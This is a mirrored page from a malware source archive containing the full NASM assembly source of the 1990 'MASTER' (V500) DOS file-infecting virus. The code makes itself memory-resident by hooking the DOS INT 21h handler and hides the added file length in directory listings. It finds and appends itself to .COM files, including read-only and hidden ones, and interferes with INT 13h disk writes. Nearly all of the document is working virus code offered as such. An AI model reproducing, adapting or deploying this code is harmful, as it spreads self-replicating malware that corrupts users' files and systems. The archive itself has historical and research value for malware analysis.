mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-28 09:52:32 +00:00
311 lines
7.0 KiB
NASM
311 lines
7.0 KiB
NASM
; (C) Copyright VirusSoft Corp. Sep., 1990
|
|
;
|
|
; This is the SOURCE file of last version of MASTER,(V500),(MG) ect.
|
|
; virus, distributed by VirusSoft company . First version was made
|
|
; in May., 1990 . Please don't make any corections in this file !
|
|
;
|
|
; Bulgaria, Varna
|
|
; Sep. 27, 1990
|
|
|
|
|
|
|
|
ofs = 201h
|
|
len = offset end-ofs
|
|
|
|
call $+6
|
|
|
|
org ofs
|
|
|
|
first: dw 020cdh
|
|
db 0
|
|
|
|
pop di
|
|
dec di
|
|
dec di
|
|
mov si,[di]
|
|
dec di
|
|
add si,di
|
|
push cs
|
|
push di
|
|
cld
|
|
movsw
|
|
movsb
|
|
xchg ax,dx
|
|
|
|
mov ax,4b04h
|
|
int 21h
|
|
jnc residnt
|
|
|
|
xor ax,ax
|
|
mov es,ax
|
|
mov di,ofs+3
|
|
mov cx,len-3
|
|
rep movsb
|
|
|
|
les di,[6]
|
|
mov al,0eah
|
|
dec cx
|
|
repne scasb
|
|
les di,es:[di] ; Searching for the INT21 vector
|
|
sub di,-1ah-7
|
|
|
|
db 0eah
|
|
dw offset jump,0 ; jmp far 0000:jump
|
|
|
|
jump: push es
|
|
pop ds
|
|
mov si,[di+3-7] ;
|
|
lodsb ;
|
|
cmp al,68h ; compare DOS Ver
|
|
mov [di+4-7],al ; Change CMP AH,CS:[????]
|
|
mov [di+2-7],0fc80h ;
|
|
mov [di-7],0fccdh ;
|
|
|
|
push cs
|
|
pop ds
|
|
|
|
mov [1020],di ; int 0ffh
|
|
mov [1022],es
|
|
|
|
mov beg-1,byte ptr not3_3-beg
|
|
jb not3.3 ; CY = 0 --> DOS Ver > or = 3.30
|
|
mov beg-1,byte ptr 0
|
|
mov [7b4h],offset pr7b4
|
|
mov [7b6h],cs ; 7b4
|
|
|
|
not3.3: mov al,0a9h ; Change attrib
|
|
cont: repne scasb
|
|
cmp es:[di],0ffd8h
|
|
jne cont
|
|
mov al,18h
|
|
stosb
|
|
|
|
push ss
|
|
pop ds
|
|
|
|
push ss
|
|
pop es
|
|
|
|
residnt: xchg ax,dx
|
|
retf ; ret far
|
|
|
|
;--------Interrupt process--------;
|
|
|
|
i21pr: push ax
|
|
push dx
|
|
push ds
|
|
push cx
|
|
push bx
|
|
push es
|
|
|
|
if4b04: cmp ax,4b04h
|
|
je rti
|
|
|
|
xchg ax,cx
|
|
mov ah,02fh
|
|
int 0ffh
|
|
|
|
if11_12: cmp ch,11h
|
|
je yes
|
|
cmp ch,12h
|
|
jne inffn
|
|
yes: xchg ax,cx
|
|
int 0ffh
|
|
push ax
|
|
test es:byte ptr [bx+19],0c0h
|
|
jz normal
|
|
sub es:[bx+36],len
|
|
normal: pop ax
|
|
rti: pop es
|
|
pop bx
|
|
pop cx
|
|
add sp,12
|
|
iret
|
|
|
|
inffn: mov ah,19h
|
|
int 0ffh
|
|
push ax
|
|
|
|
if36: cmp ch,36h ; -free bytes
|
|
je beg_36
|
|
if4e: cmp ch,4eh ; -find first FM
|
|
je beg_4b
|
|
if4b: cmp ch,4bh ; -exec
|
|
je beg_4b
|
|
if47: cmp ch,47h ; -directory info
|
|
jne if5b
|
|
cmp al,2
|
|
jae begin ; it's hard-disk
|
|
if5b: cmp ch,5bh ; -create new
|
|
je beg_4b
|
|
if3c_3d: shr ch,1 ; > -open & create
|
|
cmp ch,1eh ; -
|
|
je beg_4b
|
|
|
|
jmp rest
|
|
|
|
beg_4b: mov ax,121ah
|
|
xchg dx,si
|
|
int 2fh
|
|
xchg ax,dx
|
|
xchg ax,si
|
|
|
|
beg_36: mov ah,0eh ; change current drive
|
|
dec dx ;
|
|
int 0ffh ;
|
|
|
|
begin:
|
|
push es ; save DTA address
|
|
push bx ;
|
|
sub sp,44
|
|
mov dx,sp ; change DTA
|
|
push sp
|
|
mov ah,1ah
|
|
push ss
|
|
pop ds
|
|
int 0ffh
|
|
mov bx,dx
|
|
|
|
push cs
|
|
pop ds
|
|
|
|
mov ah,04eh
|
|
mov dx,offset file
|
|
mov cx,3 ; r/o , hidden
|
|
int 0ffh ; int 21h
|
|
jc lst
|
|
|
|
next: test ss:[bx+21],byte ptr 80h
|
|
jz true
|
|
nxt: mov ah,4fh ; find next
|
|
int 0ffh
|
|
jnc next
|
|
lst: jmp last
|
|
|
|
true: cmp ss:[bx+27],byte ptr 0fdh
|
|
ja nxt
|
|
mov [144],offset i24pr
|
|
mov [146],cs
|
|
|
|
les ax,[4ch] ; int 13h
|
|
mov i13adr,ax
|
|
mov i13adr+2,es
|
|
jmp short $
|
|
beg: mov [4ch],offset i13pr
|
|
mov [4eh],cs
|
|
|
|
|
|
not3_3: push ss
|
|
pop ds
|
|
push [bx+22] ; time +
|
|
push [bx+24] ; date +
|
|
push [bx+21] ; attrib +
|
|
lea dx,[bx+30] ; ds : dx = offset file name
|
|
mov ax,4301h ; Change attrib !!!
|
|
pop cx
|
|
and cx,0feh ; clear r/o and CH
|
|
or cl,0c0h ; set Infect. attr
|
|
int 0ffh
|
|
|
|
mov ax,03d02h ; open
|
|
int 0ffh ; int 21h
|
|
xchg ax,bx
|
|
|
|
push cs
|
|
pop ds
|
|
|
|
mov ah,03fh
|
|
mov cx,3
|
|
mov dx,offset first
|
|
int 0ffh
|
|
|
|
mov ax,04202h ; move fp to EOF
|
|
xor dx,dx
|
|
mov cx,dx
|
|
int 0ffh
|
|
mov word ptr cal_ofs+1,ax
|
|
|
|
mov ah,040h
|
|
mov cx,len
|
|
mov dx,ofs
|
|
int 0ffh
|
|
jc not_inf
|
|
|
|
mov ax,04200h
|
|
xor dx,dx
|
|
mov cx,dx
|
|
int 0ffh
|
|
|
|
mov ah,040h
|
|
mov cx,3
|
|
mov dx,offset cal_ofs
|
|
int 0ffh
|
|
|
|
not_inf: mov ax,05701h
|
|
pop dx ; date
|
|
pop cx ; time
|
|
int 0ffh
|
|
|
|
mov ah,03eh ; close
|
|
int 0ffh
|
|
|
|
les ax,dword ptr i13adr
|
|
mov [4ch],ax ; int 13h
|
|
mov [4eh],es
|
|
|
|
last: add sp,46
|
|
pop dx
|
|
pop ds ; restore DTA
|
|
mov ah,1ah
|
|
int 0ffh
|
|
|
|
rest: pop dx ; restore current drive
|
|
mov ah,0eh ;
|
|
int 0ffh ;
|
|
|
|
pop es
|
|
pop bx
|
|
pop cx
|
|
pop ds
|
|
pop dx
|
|
pop ax
|
|
|
|
i21cl: iret ; Return from INT FC
|
|
|
|
i24pr: mov al,3 ; Critical errors
|
|
iret
|
|
|
|
i13pr: cmp ah,3
|
|
jne no
|
|
inc byte ptr cs:activ
|
|
dec ah
|
|
no: jmp dword ptr cs:i13adr
|
|
|
|
pr7b4: db 2eh,0d0h,2eh
|
|
dw offset activ
|
|
; shr cs:activ,1
|
|
jnc ex7b0
|
|
inc ah
|
|
ex7b0: jmp dword ptr cs:[7b0h]
|
|
|
|
;--------
|
|
|
|
file: db "*",32,".COM"
|
|
|
|
|
|
activ: db 0
|
|
|
|
dw offset i21pr ; int 0fch
|
|
dw 0
|
|
|
|
cal_ofs: db 0e8h
|
|
|
|
end:
|
|
dw ? ; cal_ofs
|
|
|
|
i13adr: dw ?
|
|
dw ?
|
|
|
|
|
|
; The End.---
|